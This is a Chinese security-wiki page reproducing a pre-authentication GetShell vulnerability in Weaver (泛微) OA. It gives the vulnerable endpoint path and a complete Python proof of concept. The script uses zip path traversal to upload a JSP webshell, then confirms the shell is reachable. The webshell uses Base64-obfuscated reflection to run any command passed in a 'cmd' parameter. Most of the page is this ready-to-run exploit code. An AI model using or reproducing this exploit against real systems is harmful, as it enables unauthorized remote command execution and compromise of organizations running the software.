menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right Vulnerability-棱角社区(Vulnerability)项目漏洞-20210715 chevron_right 泛微 OA 前台 GetShell 复现.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    泛微 OA 前台 GetShell 复现.md
    2.53 KB / 2021-05-21 09:14:38
        # 泛微 OA 前台 GetShell 复现
    
    漏洞路径:
    
    /weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp
    
    直接访问如状态码为200则大部分都存在。
    
    构造zip压缩包上传进行getshell。
    
    PoC.py:
    
    ```py
    import zipfile
    import random
    import sys
    import requests
    
    
    
    def generate_random_str(randomlength=16):
      random_str = ''
      base_str = 'ABCDEFGHIGKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz0123456789'
      length = len(base_str) - 1
      for i in range(randomlength):
        random_str += base_str[random.randint(0, length)]
      return random_str
    
    mm = generate_random_str(8)
    
    webshell_name1 = mm+'.jsp'
    webshell_name2 = '../../../'+webshell_name1
    
    def file_zip():
        shell = """<%@ page contentType="text/html;charset=UTF-8" language="java" %>
    <%@ page import="sun.misc.BASE64Decoder" %>
    <%
        if(request.getParameter("cmd")!=null){
            BASE64Decoder decoder = new BASE64Decoder();
            Class rt = Class.forName(new String(decoder.decodeBuffer("amF2YS5sYW5nLlJ1bnRpbWU=")));
            Process e = (Process)
                    rt.getMethod(new String(decoder.decodeBuffer("ZXhlYw==")), String.class).invoke(rt.getMethod(new
                            String(decoder.decodeBuffer("Z2V0UnVudGltZQ=="))).invoke(null, new
                            Object[]{}), request.getParameter("cmd") );
            java.io.InputStream in = e.getInputStream();
            int a = -1;
            byte[] b = new byte[2048];
            out.print("<pre>");
            while((a=in.read(b))!=-1){
                out.println(new String(b));
            }
            out.print("</pre>");
        }
    %>
        """   ## 替换shell内容
        zf = zipfile.ZipFile(mm+'.zip', mode='w', compression=zipfile.ZIP_DEFLATED)
        zf.writestr(webshell_name2, shell)
    
    def GetShell(urllist):
        file_zip()
        print('上传文件中')
        urls = urllist + '/weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp'
        file = [('file1', (mm+'.zip', open(mm + '.zip', 'rb'), 'application/zip'))]
        requests.post(url=urls,files=file,timeout=60, verify=False)
        GetShellurl = urllist+'/cloudstore/'+webshell_name1
        GetShelllist = requests.get(url = GetShellurl)
        if GetShelllist.status_code == 200:
            print('利用成功webshell地址为:'+GetShellurl)
        else:
            print('未找到webshell利用失败')
    
    def main():
        if (len(sys.argv) == 2):
            url = sys.argv[1]
            GetShell(url)
        else:
            print("python3 lgo.py http://xx.xx.xx.xx")
    
    if __name__ == '__main__':
        main()
    
    ```
    
    ref:
    
    https://www.cnblogs.com/nul1/p/14749353.html
    
    links
    file_download